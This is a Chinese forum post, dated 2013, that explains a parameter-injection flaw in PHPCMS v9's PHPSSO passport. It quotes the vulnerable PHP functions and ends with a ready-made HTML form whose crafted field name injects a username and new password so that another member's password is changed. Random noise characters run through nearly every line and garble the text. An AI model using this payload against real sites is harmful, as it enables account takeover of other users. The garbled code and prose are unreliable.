提到的通行证的代码:
5 o) y; P4 P5 U+ f5 J+ w& g, U) B& e
& i3 {& Z% U. i! ~ p- G1 l/ X3 `
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
; u$ }: @3 B/ X) P3 N6 T' O% ]9 P, H; I. m, r5 x6 M2 L
在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。3 q7 V" a2 x( b3 R, x
( W1 M6 u/ \1 }" x9 V" z: R3 O3 y
我把它留给了你们。
( ~: {3 V6 a1 X* ?, }6 [- m% V6 M不知道你们发现了它没有。
% t' Y7 U' q6 X7 f7 H! |# S+ i" v
+ Z0 K6 r+ f- ]! y我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。! A( {7 N2 L( d. n
2 @( ~1 l5 G: v1 a" E7 p
所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。
( e8 `5 j" Q: ~* A9 _! @
) l9 O% C- Q8 d4 q b" A2 u2 V也就是1 T) Q$ i$ {/ j* D1 g" H0 m
5 m6 \5 H, O: ?, E/ {
username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。6 h: @! @8 m3 M" r' m. I' L; v
( x) F7 x% t9 g" @
要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。
* P) E; ]5 j9 R8 B c' e. a
: @, x9 s8 _% }1 W
6 g& M( z( C: N! M0 M其实我们有这样的机会,看看代码,如下:2 d8 d/ {; h6 T6 t) `) |
2 Y( y" D) S) [9 F5 r! ]
7 x. y0 z+ O$ Tpublic function auth_data($data) {3 |4 L( }: P* [: P( N
$s = $sep = '';
2 a0 U8 u) j( X$ L0 F# P: Z+ ]& w foreach($data as $k => $v) {
+ y5 f5 S+ u0 ?: g! A8 M" K if(is_array($v)) {/ f3 L; m# I+ S, `: t+ Z, f
$s2 = $sep2 = '';
& N9 I1 r' b9 W5 c" R foreach($v as $k2 => $v2) {
/ l8 h. v# n# R $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);) a9 J9 P( q3 l8 r# @
$sep2 = '&';
5 a! m- N' Z, q2 C, d6 _4 {( a6 J# ] }
1 G8 W1 d! A$ m& a $s .= $sep.$s2;
7 O7 p C$ b9 w% p& y. { } else {" {: y5 f: |+ g
$s .= "$sep$k=".$this->_ps_stripslashes($v);
- J* z2 F; V! D Z I9 u }
5 o) H: l& T6 N, j# j+ u $sep = '&';0 |* G* M. o& a; R7 u
}
% c/ O8 Z% h8 q1 S$ A$ e3 e& K# j0 ~+ _2 w+ i: N
$auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
7 j3 @& J- w/ y+ b* C return $auth_s;. ~: U$ t' @" _& {2 S/ n; J
}
9 ?& j1 }% G! ~1 w, @& X+ \8 E: @; c+ E2 F4 q3 R5 t- v% C& M1 ^
可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。$ R7 F0 d( P: ]+ O2 M
! Q, t8 B- n# Y) W, ^" w
举个例子: a, F2 F* j8 g
; u+ B$ o& \* ?: V3 Y- o$a[aaa=a&bbb] = 'a';
7 n6 f. P& j2 E; V) ^. G2 \8 ]/ a! D6 F$ x; i
会变成aaa=a&bbb=a
4 H/ s* Q2 _3 y' Q4 H5 d) v6 n2 C9 K' w, ^7 I3 N% Z r
明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。# ~8 H2 f+ s; _
) B9 j! I+ [* i/ C
这个时候,我们可以再去看一个函数。9 b0 I$ a6 d# Q5 I6 g3 K5 n' {
% N5 O4 k$ i G8 i4 {- \就在这个文件内:& S$ Y5 {3 T5 }+ _
' S, g" e( L# G! Q/ o5 Y6 A0 u R" H4 j
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
! p/ f: {+ w7 A3 k if($email && !$this->_is_email($email)) {
3 i$ z% k2 l2 ?2 e# k. x return -4;
Y* D) Q3 A5 w9 |9 g& ^ }* |3 Q5 N6 F+ e
return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
/ }) p: D. F, W: k }
3 P5 g. n2 J2 I' Y$ H1 l9 W8 L. p0 t6 ?
这是向通行证发了这样一个请求。
$ P. L$ ~8 D$ ]6 }( s
) x# t2 l( R5 C9 U我们再跟到通信证代码里去看看,就会有所发现。# |. c( ]& ]& }! K6 X0 E# X
8 d3 B8 k# K+ ]' c' Y% A3 _. r9 U F( U# Y
public function edit() {: g3 p. B0 B/ u6 l2 `
//能省就省,太长了不是吗?1 E- s7 C l: z1 }6 `
& l0 Z2 |9 |% N1 o7 K9 r) q$ m& I* w
if($this->username) {0 z" A4 y4 o# {' w
//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。* r; _9 b2 M8 g! H/ c
$res = $this->db->update($data, array('username'=>$this->username));" r* ?+ }2 g3 l* T
} else {
3 P! `0 w+ A; x" w. u file_put_contents('typeb.txt',print_r($data,1).$this->uid);& i: F5 J8 ~3 z6 h; T( ?' N
$res = $this->db->update($data, array('uid'=>$this->uid));& D" Z8 @3 N2 p1 {: K
}
8 t" v9 {0 \! h/ j" m* i1 h4 a: O- Z3 L( W6 o1 X: T
好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:# P0 [# Z- b' k6 n; g0 f
$ A" E- n& n* @5 c- X$ [4 l/ l
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
$ E" V% d* \! w, }7 H% H
6 j. R- h' c7 H% @: ?! J" Z很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。
$ l. G" [9 t8 I+ U! `
3 M, A& p. Z: R$ k我当然找到了:; ^7 ?5 D/ w) `! {0 m
phpcms9/phpcms/modules/member/index.php9 h; F% s$ Z9 g8 E6 C# r
* w# b# ]2 {2 v" k! _1 J+ v' T$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
6 L& q: q$ S: u7 ]
/ `* |6 L! `/ A' _1 E然后就没有然后了。
. l, z/ @3 g$ R5 a8 B
8 j( w0 x6 M' _8 u% X<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
& l& g, H" m# L0 M/ B1 n <table width="100%" cellspacing="0" class="table_form"> p0 l7 F% l4 K5 F/ `+ E
<tr>4 n$ {) E {: a4 v% I F) G
<th width="80">邮箱:</th> + C( A/ M' Q) K2 |
<td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>( y; I- e* J( S) C2 t% F5 D4 S
</tr>
* X$ M' ~, j G+ d, c <tr>9 Q4 N( q0 E1 {- {1 H' r5 k F
<th width="80">原密码:</th>
; Q# m" E9 _8 r( B" h8 R$ z, L <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
* O" C3 Z! F9 c2 f </tr>
% D* o& ?. e `% a$ V( P <tr>% M+ ], ], u6 r4 z8 m
<th>新密码:</th>( A9 d% f; R6 a. K9 p8 n) x
<td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>; M, x- C! Z5 y/ L2 T* o
</tr>
- u3 Z, P* S( x. c! R <th></th>
6 j! g5 O3 a8 D1 V- u <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>" t. R. H& D5 I1 w2 m
</tr># ?" @6 Q, ~6 t+ [* M2 `# {# f) }
</table>
* t$ }: ^7 d* w8 X3 G7 C& w; ]* F# v6 i- I7 H6 X+ D: ?
_: q9 o; L$ C1 K+ c. l </form>: n3 M/ F! o3 D" V- Q
|
发表于 2013-2-23 14:46:35
收藏
支持
反对